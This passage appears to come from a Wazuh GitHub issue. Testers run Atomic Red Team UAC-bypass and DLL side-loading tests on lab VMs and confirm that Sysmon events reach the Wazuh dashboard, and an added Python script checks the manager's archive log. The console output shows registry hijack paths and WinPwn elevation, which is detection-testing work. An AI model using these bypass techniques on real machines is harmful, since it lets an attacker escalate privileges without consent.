PSProvider      : Microsoft.PowerShell.Core\Registry

Exit code: 0
Done executing test: T1548.002-4 Bypass UAC using Fodhelper - PowerShell
Executing test: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell)

    Hive: HKEY_CURRENT_USER\software\classes\ms-settings\shell\open

Name                           Property
----                           --------
command

DelegateExecute :
PSPath          : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\software\classes\ms-settings\shell\open\command
PSParentPath    : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\software\classes\ms-settings\shell\open
PSChildName     : command
PSDrive         : HKCU
PSProvider      : Microsoft.PowerShell.Core\Registry

Exit code: 0
Done executing test: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell)
Executing test: T1548.002-6 Bypass UAC by Mocking Trusted Directories
        1 file(s) copied.
symbolic link created for c:\testbypass.exe <<===>> \\?\C:\Windows \System32\mmc.exe
Exit code: 0
Done executing test: T1548.002-6 Bypass UAC by Mocking Trusted Directories
Executing test: T1548.002-7 Bypass UAC using sdclt DelegateExecute

    Hive: HKEY_CURRENT_USER\Software\Classes\Folder\shell\open

Name                           Property
----                           --------
command                        (default) : cmd.exe /c notepad.exe

DelegateExecute :
PSPath          : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command
PSParentPath    : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\Classes\Folder\shell\open
PSChildName     : command
PSDrive         : HKCU
PSProvider      : Microsoft.PowerShell.Core\Registry

Start-Process : This command cannot be run due to the error: The system cannot find the file specified.
At line:3 char:1
+ Start-Process -FilePath $env:windir\system32\sdclt.exe
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [Start-Process], InvalidOperationException
    + FullyQualifiedErrorId : InvalidOperationException,Microsoft.PowerShell.Commands.StartProcessCommand

Exit code: 0
Done executing test: T1548.002-7 Bypass UAC using sdclt DelegateExecute
Executing test: T1548.002-8 Disable UAC using reg.exe
The operation completed successfully.
Exit code: 0
Done executing test: T1548.002-8 Disable UAC using reg.exe
Executing test: T1548.002-9 Bypass UAC using SilentCleanup task
The screen cannot be set to the number of lines and columns specified.
The operation completed successfully.
Exit code: 0
Done executing test: T1548.002-9 Bypass UAC using SilentCleanup task
Executing test: T1548.002-10 UACME Bypass Method 23
Process Timed out after 120 seconds, use '-TimeoutSeconds' to specify a different timeout
Exit code: -1
Done executing test: T1548.002-10 UACME Bypass Method 23
Executing test: T1548.002-11 UACME Bypass Method 31
Exit code: -1073741637
Done executing test: T1548.002-11 UACME Bypass Method 31
Executing test: T1548.002-12 UACME Bypass Method 33
Exit code: -1073741637
Done executing test: T1548.002-12 UACME Bypass Method 33
Executing test: T1548.002-13 UACME Bypass Method 34
Exit code: -1073741637
Done executing test: T1548.002-13 UACME Bypass Method 34
Executing test: T1548.002-14 UACME Bypass Method 39
Exit code: -1073741637
Done executing test: T1548.002-14 UACME Bypass Method 39
Executing test: T1548.002-15 UACME Bypass Method 56
Exit code: -1073741637
Done executing test: T1548.002-15 UACME Bypass Method 56
Executing test: T1548.002-16 UACME Bypass Method 59
Exit code: -1073741637
Done executing test: T1548.002-16 UACME Bypass Method 59
Executing test: T1548.002-17 UACME Bypass Method 61
Exit code: -1073741637
Done executing test: T1548.002-17 UACME Bypass Method 61
Executing test: T1548.002-18 WinPwn - UAC Magic
Creating/Checking Log Folders in C:\Users\vagrant\AppData\Local\Temp directory:

    Directory: C:\Users\vagrant\AppData\Local\Temp

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         2/28/2024   2:51 AM                LocalRecon
d-----         2/28/2024   2:51 AM                DomainRecon

    Directory: C:\Users\vagrant\AppData\Local\Temp\DomainRecon

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         2/28/2024   2:51 AM                ADrecon

    Directory: C:\Users\vagrant\AppData\Local\Temp

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         2/28/2024   2:51 AM                LocalPrivEsc
d-----         2/28/2024   2:51 AM                Exploitation
d-----         2/28/2024   2:51 AM                Vulnerabilities

 __        ___       ____
 \ \      / (_)_ __ |  _ \__      ___ __
  \ \ /\ / /| | '_ \| |_) \ \ /\ / | '_ \
   \ V  V / | | | | |  __/ \ V  V /| | | |
    \_/\_/  |_|_| |_|_|     \_/\_/ |_| |_|

--> UAC Bypass
[!] Session is elevated!
Exit code: 0
Done executing test: T1548.002-18 WinPwn - UAC Magic
Executing test: T1548.002-19 WinPwn - UAC Bypass ccmstp technique
Creating/Checking Log Folders in C:\Users\vagrant\AppData\Local\Temp directory:

 __        ___       ____
 \ \      / (_)_ __ |  _ \__      ___ __
  \ \ /\ / /| | '_ \| |_) \ \ /\ / | '_ \
   \ V  V / | | | | |  __/ \ V  V /| | | |
    \_/\_/  |_|_| |_|_|     \_/\_/ |_| |_|

--> UAC Bypass

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
     61       5      636       2616       0.03   3828   1 cmstp
True
True
Process : cmstp
Hwnd    : 3343146
Exit code: 0
Done executing test: T1548.002-19 WinPwn - UAC Bypass ccmstp technique
Executing test: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique
Creating/Checking Log Folders in C:\Users\vagrant\AppData\Local\Temp directory:

 __        ___       ____
 \ \      / (_)_ __ |  _ \__      ___ __
  \ \ /\ / /| | '_ \| |_) \ \ /\ / | '_ \
   \ V  V / | | | | |  __/ \ V  V /| | | |
    \_/\_/  |_|_| |_|_|     \_/\_/ |_| |_|

--> UAC Bypass
Exit code: 0
Done executing test: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique
Executing test: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique
Exit code: 0
Done executing test: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique
Executing test: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key
Exit code: 0
Done executing test: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key
Executing test: T1548.002-23 UAC Bypass with WSReset Registry Modification
Exit code: 0
Done executing test: T1548.002-23 UAC Bypass with WSReset Registry Modification
Executing test: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key
Exit code: 0
Done executing test: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key
Executing test: T1548.002-25 Disable UAC notification via registry keys
The operation completed successfully.
Exit code: 0
Done executing test: T1548.002-25 Disable UAC notification via registry keys
Executing test: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys
The operation completed successfully.
Exit code: 0
Done executing test: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys
```
Cleanup

```console
PS C:\Users\vagrant\Desktop\Sysmon> Invoke-AtomicTest T1548.002 -Cleanup
PathToAtomicsFolder = C:\AtomicRedTeam\atomics

Executing cleanup for test: T1548.002-1 Bypass UAC using Event Viewer (cmd)
Done executing cleanup for test: T1548.002-1 Bypass UAC using Event Viewer (cmd)
Executing cleanup for test: T1548.002-2 Bypass UAC using Event Viewer (PowerShell)
Done executing cleanup for test: T1548.002-2 Bypass UAC using Event Viewer (PowerShell)
Executing cleanup for test: T1548.002-3 Bypass UAC using Fodhelper
Done executing cleanup for test: T1548.002-3 Bypass UAC using Fodhelper
Executing cleanup for test: T1548.002-4 Bypass UAC using Fodhelper - PowerShell
Done executing cleanup for test: T1548.002-4 Bypass UAC using Fodhelper - PowerShell
Executing cleanup for test: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell)
Done executing cleanup for test: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell)
Executing cleanup for test: T1548.002-6 Bypass UAC by Mocking Trusted Directories
Done executing cleanup for test: T1548.002-6 Bypass UAC by Mocking Trusted Directories
Executing cleanup for test: T1548.002-7 Bypass UAC using sdclt DelegateExecute
Done executing cleanup for test: T1548.002-7 Bypass UAC using sdclt DelegateExecute
Executing cleanup for test: T1548.002-8 Disable UAC using reg.exe
The operation completed successfully.
Done executing cleanup for test: T1548.002-8 Disable UAC using reg.exe
Executing cleanup for test: T1548.002-9 Bypass UAC using SilentCleanup task
Done executing cleanup for test: T1548.002-9 Bypass UAC using SilentCleanup task
Executing cleanup for test: T1548.002-10 UACME Bypass Method 23
Done executing cleanup for test: T1548.002-10 UACME Bypass Method 23
Executing cleanup for test: T1548.002-11 UACME Bypass Method 31
Done executing cleanup for test: T1548.002-11 UACME Bypass Method 31
Executing cleanup for test: T1548.002-12 UACME Bypass Method 33
Done executing cleanup for test: T1548.002-12 UACME Bypass Method 33
Executing cleanup for test: T1548.002-13 UACME Bypass Method 34
Done executing cleanup for test: T1548.002-13 UACME Bypass Method 34
Executing cleanup for test: T1548.002-14 UACME Bypass Method 39
Done executing cleanup for test: T1548.002-14 UACME Bypass Method 39
Executing cleanup for test: T1548.002-15 UACME Bypass Method 56
Done executing cleanup for test: T1548.002-15 UACME Bypass Method 56
Executing cleanup for test: T1548.002-16 UACME Bypass Method 59
Done executing cleanup for test: T1548.002-16 UACME Bypass Method 59
Executing cleanup for test: T1548.002-17 UACME Bypass Method 61
Done executing cleanup for test: T1548.002-17 UACME Bypass Method 61
Executing cleanup for test: T1548.002-18 WinPwn - UAC Magic
Done executing cleanup for test: T1548.002-18 WinPwn - UAC Magic
Executing cleanup for test: T1548.002-19 WinPwn - UAC Bypass ccmstp technique
Done executing cleanup for test: T1548.002-19 WinPwn - UAC Bypass ccmstp technique
Executing cleanup for test: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique
Done executing cleanup for test: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique
Executing cleanup for test: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique
Done executing cleanup for test: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique
Executing cleanup for test: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key
Done executing cleanup for test: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key
Executing cleanup for test: T1548.002-23 UAC Bypass with WSReset Registry Modification
Done executing cleanup for test: T1548.002-23 UAC Bypass with WSReset Registry Modification
Executing cleanup for test: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key
Done executing cleanup for test: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key
Executing cleanup for test: T1548.002-25 Disable UAC notification via registry keys
The operation completed successfully.
Done executing cleanup for test: T1548.002-25 Disable UAC notification via registry keys
Executing cleanup for test: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys
The operation completed successfully.
Done executing cleanup for test: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys
```
Sysmon event log

![T1548 002Reg](https://github.com/wazuh/wazuh/assets/95248059/bcd62e7c-ca1d-4fb0-ac64-abc18ffd2056)

Dashboard event

![Screenshot from 2024-02-28 00-54-21](https://github.com/wazuh/wazuh/assets/95248059/51cfac0b-8e78-4460-962b-b357ba37bfd1)
![Screenshot from 2024-02-28 00-54-28](https://github.com/wazuh/wazuh/assets/95248059/f288cb0a-aabd-423c-872b-c2c4c8baddf0)

T1574.002 – Hijack Execution Flow: DLL Side-Loading

GetPrereqs

```console
PS C:\Users\vagrant\Desktop\Sysmon> Invoke-AtomicTest T1574.002 -GetPrereqs
PathToAtomicsFolder = C:\AtomicRedTeam\atomics

GetPrereq's for: T1574.002-1 DLL Side-Loading using the Notepad++ GUP.exe binary
Attempting to satisfy prereq: Gup.exe binary must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1574.002\bin\GUP.exe)
Prereq already met: Gup.exe binary must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1574.002\bin\GUP.exe)
GetPrereq's for: T1574.002-2 DLL Side-Loading using the dotnet startup hook environment variable
Attempting to satisfy prereq: .Net SDK must be installed
Prereq already met: .Net SDK must be installed
Attempting to satisfy prereq: preloader must exist
Prereq already met: preloader must exist
PS C:\Users\vagrant\Desktop\Sysmon
```
Test run

```console
PS C:\Users\vagrant\Desktop\Sysmon> Invoke-AtomicTest T1574.002
PathToAtomicsFolder = C:\AtomicRedTeam\atomics

Executing test: T1574.002-1 DLL Side-Loading using the Notepad++ GUP.exe binary
Exit code: -1073741515
Done executing test: T1574.002-1 DLL Side-Loading using the Notepad++ GUP.exe binary
Executing test: T1574.002-2 DLL Side-Loading using the dotnet startup hook environment variable
Unhandled exception. System.ArgumentException: The startup hook simple assembly name '"C:\AtomicRedTeam\atomics\T1574.002\bin\preloader.dll" ' is invalid. It must be a valid assembly name and it may not contain directory separator, space or comma characters and must not end with '.dll'.
   at System.StartupHookProvider.ParseStartupHook(StartupHookNameOrPath& startupHook, String startupHookPart)
   at System.StartupHookProvider.ProcessStartupHooks(String diagnosticStartupHooks)
Exit code: 0
Done executing test: T1574.002-2 DLL Side-Loading using the dotnet startup hook environment variable
PS C:\Users\vagrant\Desktop\Sysmon>
```
Cleanup

```console
PS C:\Users\vagrant\Desktop\Sysmon> Invoke-AtomicTest T1574.002 -Cleanup
PathToAtomicsFolder = C:\AtomicRedTeam\atomics

Executing cleanup for test: T1574.002-1 DLL Side-Loading using the Notepad++ GUP.exe binary
Done executing cleanup for test: T1574.002-1 DLL Side-Loading using the Notepad++ GUP.exe binary
Executing cleanup for test: T1574.002-2 DLL Side-Loading using the dotnet startup hook environment variable
Done executing cleanup for test: T1574.002-2 DLL Side-Loading using the dotnet startup hook environment variable
PS C:\Users\vagrant\Desktop\Sysmon>
```
Sysmon event log

![T1574Reg](https://github.com/wazuh/wazuh/assets/95248059/5e09b3d2-45a8-432c-a7dd-eb3ee7b32da0)

Dashboard event

![Screenshot from 2024-02-28 00-21-36](https://github.com/wazuh/wazuh/assets/95248059/ec431eed-1cf4-47ae-a8a3-dd2ae8d37087)
![Screenshot from 2024-02-28 00-21-46](https://github.com/wazuh/wazuh/assets/95248059/ad36ddd8-ab0a-41b8-95f0-163339601b42)
LucioDonda commented 6 months ago

Test that Windows data collection works out of the box.

After enabling logall and sending Windows Events, we can see the logs immediately:

Windows 11 🟢

1. Create an event in the Windows agent

```console
PS C:\Users\vagrant\Sysmon> EVENTCREATE /T ERROR /L APPLICATION /so TESTING /ID 999 /D "%1 %2"

SUCCESS: An event of type 'ERROR' was created in the 'APPLICATION' log with 'TESTING' as the source.
PS C:\Users\vagrant\Sysmon>
```

2. Check logs in the manager

```console
[root@vm-oracle9 vagrant]# cat /var/ossec/logs/archives/archives.log | grep '2024 Feb 27 22:30:07 (DESKTOP-D42041D) any->EventChannel {"win":{"system":{"providerName":"TESTING"'
2024 Feb 27 22:30:07 (DESKTOP-D42041D) any->EventChannel {"win":{"system":{"providerName":"TESTING","eventID":"999","version":"0","level":"2","task":"0","opcode":"0","keywords":"0x80000000000000","systemTime":"2024-02-27T22:30:07.9596517Z","eventRecordID":"877","processID":"13100","threadID":"0","channel":"Application","computer":"DESKTOP-D42041D","severityValue":"ERROR","message":"\"%1 %2\""},"eventdata":{"data":"%1 %2"}}}
[root@vm-oracle9 vagrant]#
```

3. Dashboard

![Screenshot from 2024-02-27 19-42-55](https://github.com/wazuh/wazuh/assets/95248059/4cfd86de-0bab-4c57-907b-8204a6572b37)
![Screenshot from 2024-02-27 19-43-02](https://github.com/wazuh/wazuh/assets/95248059/b74f940e-8e97-4299-8a24-acabff86d082)
Windows Server 2022 🟢

1. Create an event in the Windows agent

```console
PS C:\Users\vagrant> EVENTCREATE /T ERROR /L APPLICATION /so TESTING /ID 999 /D "%1 %2"

SUCCESS: An event of type 'ERROR' was created in the 'APPLICATION' log with 'TESTING' as the source.
PS C:\Windows\system32> Get-NetIPAddress -AddressFamily IPV4

IPAddress         : 192.168.56.103
InterfaceIndex    : 7
InterfaceAlias    : Ethernet 2
AddressFamily     : IPv4
Type              : Unicast
PrefixLength      : 24
PrefixOrigin      : Dhcp
SuffixOrigin      : Dhcp
AddressState      : Preferred
ValidLifetime     : 00:09:58
PreferredLifetime : 00:09:58
SkipAsSource      : False
PolicyStore       : ActiveStore

IPAddress         : 10.0.2.15
InterfaceIndex    : 3
InterfaceAlias    : Ethernet
AddressFamily     : IPv4
Type              : Unicast
PrefixLength      : 24
PrefixOrigin      : Dhcp
SuffixOrigin      : Dhcp
AddressState      : Preferred
ValidLifetime     : 23:59:58
PreferredLifetime : 23:59:58
SkipAsSource      : False
PolicyStore       : ActiveStore

IPAddress         : 127.0.0.1
InterfaceIndex    : 1
InterfaceAlias    : Loopback Pseudo-Interface 1
AddressFamily     : IPv4
Type              : Unicast
PrefixLength      : 8
PrefixOrigin      : WellKnown
SuffixOrigin      : WellKnown
AddressState      : Preferred
ValidLifetime     : Infinite ([TimeSpan]::MaxValue)
PreferredLifetime : Infinite ([TimeSpan]::MaxValue)
SkipAsSource      : False
PolicyStore       : ActiveStore
```

2. Check logs in the manager

```console
[root@vm-oracle9 vagrant]# cat /var/ossec/logs/archives/archives.log | grep '"eventID":"999"'
2024 Feb 28 01:10:58 (WIN-PJCK32G1EDD) any->EventChannel {"win":{"system":{"providerName":"TESTING","eventID":"999","version":"0","level":"2","task":"0","opcode":"0","keywords":"0x80000000000000","systemTime":"2024-02-28T01:10:58.4800666Z","eventRecordID":"396","processID":"0","threadID":"0","channel":"Application","computer":"WIN-PJCK32G1EDD","severityValue":"ERROR"},"eventdata":{"data":"%1 %2"}}}
```

3. Dashboard

![Screenshot from 2024-02-27 22-19-22](https://github.com/wazuh/wazuh/assets/95248059/8b92f5ae-fd6e-418e-84c9-26faba22ecf5)
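As an added example (not part of this issue or of Wazuh's own code), the check above can be automated instead of eyeballing a `grep`: the script below parses `archives.log` lines in the layout shown in the manager output, decodes the `EventChannel` JSON, and confirms that the `EVENTCREATE` event (provider `TESTING`, event ID `999`) arrived from every agent under test. The agent names come from the output above; the sample log lines are constructed, and the non-matching and truncated lines are made up to exercise the failure cases.

```python
"""Verify that a Windows test event reached the Wazuh manager's archives.log.

Added example, not Wazuh code. archives.log lines have the layout seen above:

    <timestamp> (<agent name>) <agent ip>-><location> <payload>

For location "EventChannel" the payload is a JSON object under a "win" key.
"""
import json
import re

ARCHIVE_LINE = re.compile(
    r"^(?P<ts>\d{4} \w{3} \d{2} \d{2}:\d{2}:\d{2}) "   # 2024 Feb 28 01:10:58
    r"\((?P<agent>[^)]+)\) "                           # (WIN-PJCK32G1EDD)
    r"(?P<ip>\S+)->(?P<location>\S+) "                 # any->EventChannel
    r"(?P<payload>.*)$"                                # the collected log itself
)


def parse_archive_line(line):
    """Split one archives.log line into its fields.

    Returns None for lines that do not follow the layout. For EventChannel
    records the JSON payload is decoded into rec["event"]; a payload that is
    not valid JSON (e.g. a truncated line) leaves rec["event"] as None.
    """
    m = ARCHIVE_LINE.match(line.rstrip("\r\n"))
    if m is None:
        return None
    rec = m.groupdict()
    rec["event"] = None
    if rec["location"] == "EventChannel":
        try:
            rec["event"] = json.loads(rec["payload"])
        except json.JSONDecodeError:
            pass
    return rec


def find_test_events(lines, provider="TESTING", event_id="999"):
    """Map agent name -> win.system block for records matching provider and event ID.

    eventID is a string inside the EventChannel JSON, so it is compared as a string.
    """
    hits = {}
    for line in lines:
        rec = parse_archive_line(line)
        if rec is None or rec["event"] is None:
            continue
        system = rec["event"].get("win", {}).get("system", {})
        if system.get("providerName") == provider and system.get("eventID") == event_id:
            hits[rec["agent"]] = system
    return hits


def missing_agents(expected, hits):
    """Agents that were expected to report the test event but did not."""
    return sorted(set(expected) - set(hits))


# Constructed sample lines modelled on the manager output above (agent names
# and event fields follow the page; the last three lines are made up).
SAMPLE_ARCHIVE = [
    '2024 Feb 27 22:30:07 (DESKTOP-D42041D) any->EventChannel '
    '{"win":{"system":{"providerName":"TESTING","eventID":"999","level":"2",'
    '"channel":"Application","computer":"DESKTOP-D42041D","severityValue":"ERROR",'
    '"message":"\\"%1 %2\\""},"eventdata":{"data":"%1 %2"}}}',
    '2024 Feb 28 01:10:58 (WIN-PJCK32G1EDD) any->EventChannel '
    '{"win":{"system":{"providerName":"TESTING","eventID":"999","level":"2",'
    '"channel":"Application","computer":"WIN-PJCK32G1EDD","severityValue":"ERROR"},'
    '"eventdata":{"data":"%1 %2"}}}',
    # Same agent, different provider and event ID: must not count as the test event.
    '2024 Feb 28 01:11:02 (WIN-PJCK32G1EDD) any->EventChannel '
    '{"win":{"system":{"providerName":"Microsoft-Windows-Security-Auditing",'
    '"eventID":"4624","channel":"Security"}}}',
    # Truncated payload: EventChannel location but not valid JSON.
    '2024 Feb 28 01:11:05 (WIN-PJCK32G1EDD) any->EventChannel {"win":{"system":',
    # A non-Windows record collected on the manager itself.
    '2024 Feb 28 01:11:09 (vm-oracle9) 127.0.0.1->/var/log/messages '
    'Feb 28 01:11:09 vm-oracle9 systemd[1]: Started Session 3 of User root.',
]

EXPECTED_AGENTS = ["DESKTOP-D42041D", "WIN-PJCK32G1EDD"]

if __name__ == "__main__":
    hits = find_test_events(SAMPLE_ARCHIVE)
    for agent, system in sorted(hits.items()):
        print(f"{agent}: {system['providerName']} event {system['eventID']} "
              f"in channel {system['channel']}")
    missing = missing_agents(EXPECTED_AGENTS, hits)
    print("missing agents:", ", ".join(missing) if missing else "none")
```

Against a real manager, replace `SAMPLE_ARCHIVE` with the lines of `/var/ossec/logs/archives/archives.log` (logall must be enabled, as noted above) and list every deployed agent in `EXPECTED_AGENTS`.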
damarisg commented 6 months ago

LGTM!!